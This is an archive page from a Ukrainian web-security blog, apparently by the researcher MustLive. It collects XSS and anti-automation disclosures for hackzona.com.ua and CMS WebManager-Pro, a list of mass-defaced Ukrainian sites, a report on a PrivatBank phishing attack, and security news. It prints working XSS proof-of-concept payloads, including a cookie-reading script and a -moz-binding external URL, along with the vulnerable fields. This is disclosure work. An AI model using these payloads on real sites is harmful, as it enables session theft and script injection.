Виявлена можливість обходу аутентифікації в Postgres Plus SQL.
Уразливі продукти: Postgres Plus SQL.
Несанкціонований доступ до DBA Management Server (TCP/9000, TCP/9363).
25.10.2010
У березні, 21.03.2010, я знайшов Insufficient Anti-automation та Cross-Site Scripting уразливості на секюріті проекті http://hackzona.com.ua. Про що найближчим часом сповіщу адміністрацію проекту.
Детальна інформація про уразливості з’явиться пізніше.
14.03.2011
Insufficient Anti-automation:
http://hackzona.com.ua/hz.php?name=Feedback
http://hackzona.com.ua/hz.php?name=NLbook
В даних формах немає захисту від автоматизованих запитів (капчі).
XSS:
POST запит на сторінці http://hackzona.com.ua/hz.php?name=Search
" style="-moz-binding:url('http://websecurity.com.ua/webtools/xss.xml#xss')В полі пошуку.
Дані уразливості вже виправлені.
У жовтні місяці відбувся масовий взлом сайтів на сервері Garant-Park-Telecom. Це російський хостер, але багато сайтів з України. Нещодавно я вже розповідав про інші масові взломи.
Був взломаний сервер російської компанії Garant-Park-Telecom. Взлом відбувся після згаданого масового взлому сайтів на сервері Freehost.
Всього було взломано 246 сайтів, з них 218 українських сайтів на сервері Garant-Park-Telecom (IP 89.111.170.128). Це наступні сайти: cayman.raskone.silver.biz.ua, convictus.kiev.ua, convictus.com.ua, chuguy.make.silver.biz.ua, doshkilnyatko.com.ua, elistom.frcbc.silver.biz.ua, carpeta.com.ua, cargogruzcom.leon49.silver.biz.ua, bypillsn.silver.biz.ua, biotech-system.make.silver.biz.ua, bimboka.dp.ua, grafskates.silver.biz.ua, imw.com.ua, duschy.com.ua, cult.sk.silver.biz.ua, green-wheel.com.ua, homeopat.dp.ua, gabro.com.ua, edoctor.com.ua, live.toni.silver.biz.ua, online.roman2.silver.biz.ua, apkservice.com.ua, andariys.monument.com.ua, adv-dva.sk.silver.biz.ua, abdomed.com.ua, acg.com.ua, kamerton.in.ua, 4dkino-com.koreyko.silver.biz.ua, manzuk.silver.biz.ua, lemonchic.com.ua, nika.dn.ua, andriy2.silver.biz.ua, dj.vadimzp2.silver.biz.ua, alexroll.silver.biz.ua, bankomat.convictus.org.ua, baz.kiev.ua, bazoka.silver.biz.ua, newrealtor.contur.net.ua, carpeta.ua, churchan.silver.biz.ua, climate.lviv.ua, contur.org.ua, contur.net.ua, com.victorcg.silver.biz.ua, conturorg.contur.net.ua, convictusnet.convictus.org.ua, convictus.org.ua, dnepr-co-ua.koreyko.silver.biz.ua, digestin.com.ua, dizel.silver.biz.ua, dmitriys.silver.biz.ua, dom.silver.biz.ua, domomania.contur.net.ua, domus.biz.ua, doshkilnyatko.contur.net.ua, dti.com.ua, eflet.silver.biz.ua, edoctor.webvideo.com.ua, eflet2.silver.biz.ua, o-hutorok.lnxd.silver.biz.ua, elistom.com.ua, psytron.com.ua, eugenevi.silver.biz.ua, etalon.uz.ua, eye.poltava.ua, fiat-lux.com.ua, forsale.co.ua, forofis.com.ua, lifeinmo.silver.biz.ua, roman2.silver.biz.ua, forsale.lviv.ua, frcbc.silver.biz.ua, geo-vision.com.ua, gbyte.silver.biz.ua, gindia.silver.biz.ua, gotovimvodu.com.ua, group.irochkon.silver.biz.ua, ibanez.silver.biz.ua, gts.org.ua, imwuser1.lnxd.silver.biz.ua, inlanger2.silver.biz.ua, iyt.com.ua, ivanushk.silver.biz.ua, iyt.yachtcharter.com.ua, sk.silver.biz.ua, sonyashnik.kiev.ua, nazard.silver.biz.ua, statusatm.com.ua, stroy.irochkon.silver.biz.ua, shlyah.contur.net.ua, td-himinvest.com.ua, irochkon.silver.biz.ua, kg-dp-ua.koreyko.silver.biz.ua, konstantin.avsz.silver.biz.ua, koreyko.silver.biz.ua, toni.silver.biz.ua, laminatparket.contur.net.ua, leon49.silver.biz.ua, letmesee.sk.silver.biz.ua, ttholod.com.ua, live.roman2.silver.biz.ua, lnxd.silver.biz.ua, main.victorcg.silver.biz.ua, makintosh.ks.ua, make.silver.biz.ua, maks-tour.com.ua, test1.nika.dn.ua, test.nika.dn.ua, ustav.silver.biz.ua, masterprint.com.ua, teploagent.com.ua, usedboats.com.ua, monument.com.ua, mykolaivka-rada.nika.dn.ua, montessori.org.ua, nacional.contur.net.ua, net.victorcg.silver.biz.ua, newboats.com.ua, newboats.yachtcharter.com.ua, newborn.silver.biz.ua, newrealtor.com.ua, vika.vadimzp2.silver.biz.ua, npoenergy.com.ua, olside.silver.biz.ua, orfey.acg.com.ua, orfey.com.ua, yachtmarina.yachtcharter.com.ua, parketmaster.com.ua, ozerniyhutorok.lnxd.silver.biz.ua, patmari.odessa.ua, pelmen.silver.biz.ua, pavlo.com.ua, pavlo.webvideo.com.ua, plantro.com.ua, polorsade.raskone.silver.biz.ua, prestige-life.com.ua, privatblog.vadimzp2.silver.biz.ua, pumping.com.ua, raskoua.raskone.silver.biz.ua, rasko.ua, raskone.silver.biz.ua, reebok.silver.biz.ua, resume.co.ua, retriver.net.ua, review.vadimzp2.silver.biz.ua, retion.silver.biz.ua, robingood.contur.net.ua, robingood.com.ua, rudi.dizel.silver.biz.ua, snooker.in.ua, snooker.contur.net.ua, startinukraine.webvideo.com.ua, stas.standov.silver.biz.ua, artfresh.silver.biz.ua, standov.silver.biz.ua, suvenirtr.silver.biz.ua, sunnyart.make.silver.biz.ua, ticketcom.acg.com.ua, tofs.roman2.silver.biz.ua, asu.silver.biz.ua, ukrfer.silver.biz.ua, unberto2.silver.biz.ua, usedboats.yachtcharter.com.ua, vadimzp.silver.biz.ua, vadimzp2.silver.biz.ua, venol-oil.silver.biz.ua, venol.com.ua, victorcg.silver.biz.ua, vitakor.silver.biz.ua, vitohaus.silver.biz.ua, august.silver.biz.ua, art-rcom.contur.net.ua, www1.elistom.com.ua, yachtmarina.com.ua, yachtcharter.com.ua, zdorovka.lnxd.silver.biz.ua, zoj.com.ua, avtoguru.contur.net.ua, artgallery.contur.net.ua, ask-complex.ask-complex.com.ua, arm-dp-ua.koreyko.silver.biz.ua, aquaritm.koreyko.silver.biz.ua, ask-complex.kiev.ua, audioline.com.ua, aviasvit.olside.silver.biz.ua, avsz.silver.biz.ua, avsn.avsz.silver.biz.ua, artland4you.videoxxi.silver.biz.ua, apkservicecomua.lnxd.silver.biz.ua, avtey.com.ua, www-promin-info.make.silver.biz.ua, garden-ua.com, skulptura-granit-mramor.monument.com.ua, art-r.com.ua, sculpture-granit-mramor.monument.com.ua, aspi.in.ua, pottery-park.koreyko.silver.biz.ua, artgallery.in.ua, provodov-net-ua.koreyko.silver.biz.ua, ask-complex.com.ua, nord-1-dp-ua.koreyko.silver.biz.ua, yonex.com.ua, fast-start-crimea-ua.make.silver.biz.ua, suvenir.com.ua, cinematix4d-com.koreyko.silver.biz.ua, turboam.com.ua, cinematix-org.koreyko.silver.silver.biz.ua, tess.in.ua, tess.contur.net.ua, alant-biz-ua.koreyko.silver.biz.ua, akalaboratory-dp-ua.koreyko.silver.biz.ua, synergos.com.ua, alina-karina-com.koreyko.silver.biz.ua, sgifts.com.ua, master-biz-ua.koreyko.silver.biz.ua, silver.biz.ua, foreign-realestate.koreyko.silver.biz.ua, www.slavuta-mvk.gov.ua. Серед них український державний сайт www.slavuta-mvk.gov.ua (дуже дивно бачити gov.ua сайт, що хоститься в іншій державі - всі державні сайти повинні хоститися у власній державі).
Всі сайти були взломані 12 жовтня 2010 року. Дефейси 217 (245) сайтів проведено хакером GHoST61 і 1 сайта хакером з By_aGReSiF.
Враховуючи велику кількість сайтів на одному сервері та короткий проміжок часу для дефейсу всіх цих сайтів, немає сумнівів, що вони були взломані через взлом серверу хостінг провайдера. Коли через взлом одного сайта, був отриманий root доступ до сервера (через уразливості в програмному забезпеченні самого сервера) та атаковані інші сайти на даному сервері.
За повідомленням hackzona.com.ua, новий варіант Zeus атакує клієнтів банків через перехоплення SMS-повідомлень.
Гучний банківський троян Zeus повертається до користувачів в новому образі - Mitmo. Нова версія Zeus націлена на призначені для користувача стільникові телефони, перехоплюючи SMS-повідомлення від банківських сервісів і користувачів, і сподіваючись перехопити банківські реквізити або логіни / паролі для систем доступу до онлайн-банкінгу. Очевидно, що даний крок хакерів спрямований на обхід систем двофакторної аутентифікації, які за останній час банки почали активно розгортати.
За повідомленням www.xakep.ru, ФБР заарештувала хакерів за витік даних про користувачів iPad.
Два дослідники систем безпеки були арештовані в справі, пов’язаній з витоком інформації, що піддала ризику більш 100000 користувачів iPad.
Федеральне Бюро Розслідувань США сказали, що заарештували дослідників системи безпеки компанії Goatse Security Ендрю Орнхаймера і Деніела Шпітлера за їхні ролі у витоку користувацької бази даних AT&T, що відбулася в червні 2010 року.
За повідомленням www.3dnews.ru, на WordPress зроблена масштабна DDoS-атака.
На початку березня найбільша у світі платформа для ведення блогів WordPress (wordpress.com) піддалася найбільш масованій в історії DDoS-атаці, у результаті чого безліч блогів стали недоступні.
Відповідно до повідомлення материнської компанії Automattic, під час атаки на сервери посилалося по декілька мільйонів пакетів інформації в секунду.
В даній добірці уразливості в веб додатках:
Нещодавно, 09.03.2011, я виявив фішинг атаку на клієнтів ПриватБанку - на користувачів Приват24. В той день я отримав два однакових фішерських листи (на два моїх емайли) з темою “PrivatBank: New security notification” стосовно змін в системі Приват24 і рекомендацією терміново відвідати власний акаунт П24 (що є типовою схемою для фішинга).
Зазначу, що сам я не користуюся Приват24, але фішинг листи все ж таки отримав 
. Це може бути пов’язано або з тим, що фішери проводили масоване розсилання спам-листів по великій базі українських емайлів (щоб хоча б на деяких користувачів П24 натрапити). Або ж мій емайл потрапив в їхній список в зв’язку з деякими моїми згадками в Інтернеті, що я іноді взаємодіяв з цією системою.
Обидва листи були відправлені з серверів англійського хостинг-провайдера uk2.net. В обох листах використовувалось ідентичне шахрайське повідомлення, що вело на фішерський сайт для крадіжки облікових даних користувачів П24. Відправка фішінг-листів відбувалась через Perl-скрипт.
Сам фішинг сайт розміщувався на сайті www.abc-centraltaxis.com, що також хоститься у цього ж провайдера (в одній з папок сайта - http://www.abc-centraltaxis.com/login.privatbank.ua/). Вірогідно даний сайт був взломаний для проведення фішинг атаки на користувачів П24. Зараз фішерських сторінок (всієї папки login.privatbank.ua) вже немає на даному сайті.
Це поширений підхід, коли фішери розміщують свої фішерськи веб-сторінки на існуючих сайтах (що вони взломали). В Уанеті такі випадки також регулярно трапляються, про що я знаю зокрема з розповідей людей, які звертаються до мене за аудитом безпеки.
В лютому, незабаром після версії 3.0.5, 23.02.2011, вишла нова версія WordPress 3.1.
WordPress 3.1 це перший випуск нової 3.1 серії. В ній додано чимало покращень порівняно з 3.0.x версіями движка, в тому числі виправлено більше 820 багів.
Серед головних покращень зокрема був змінений процес встановлення лінків, додана панель адміна, модернізований інтерфейс написання записів та сторінок і оновлена адмінська тема.
Серед покращень для розробників можна виділити наступні: підтримка форматів постів, нові можливості CMS (такі як сторінки архівів для різного контенту), новий розділ адмінки Network Admin, ревізована система імпорту та експорту і можливість робити запити розширеної таксономії та довільних полів.
11.01.2011
У жовтні, 15.10.2010, я знайшов Insufficient Anti-automation та Cross-Site Scripting уразливості в CMS WebManager-Pro. Дані уразливості я виявив на різних сайтах на CMS WebManager-Pro від FGS_Studio. Про що найближчим часом повідомлю розробникам.
Раніше я вже писав про уразливості в CMS WebManager-Pro.
Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.
11.03.2011
Insufficient Anti-automation:
На сторінці контактів (http://site/index.php?menu_id=x) немає захисту від автоматизованих запитів (капчі).
XSS:
POST запит на сторінці контактів (http://site/index.php?menu_id=x)
<script>alert(document.cookie)</script>В полях: ФИО, E-mail, Телефон, Тема письма, Текст.
Уразливі CMS WebManager-Pro v.7.4.3 (версія від FGS_Studio) та попередні версії.
Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.
Виявлені численні уразливості безпеки в Firefox, Seamonkey, Thunderbird.
Уразливі продукти: Mozilla Firefox 3.6, SeaMonkey 2.0, Thunderbird 3.1.
Численні пошкодження пам’яті, переповнення буфера, використання пам’яті після звільнення, міжсайтовий скриптінг і підміна запитів.
* 
You are currently browsing the archives.
Copyright © 2006-2025 MustLive. Усі права захищені.
Партнер проекту Websecurity.com.ua - веб проект mlfun.org.ua.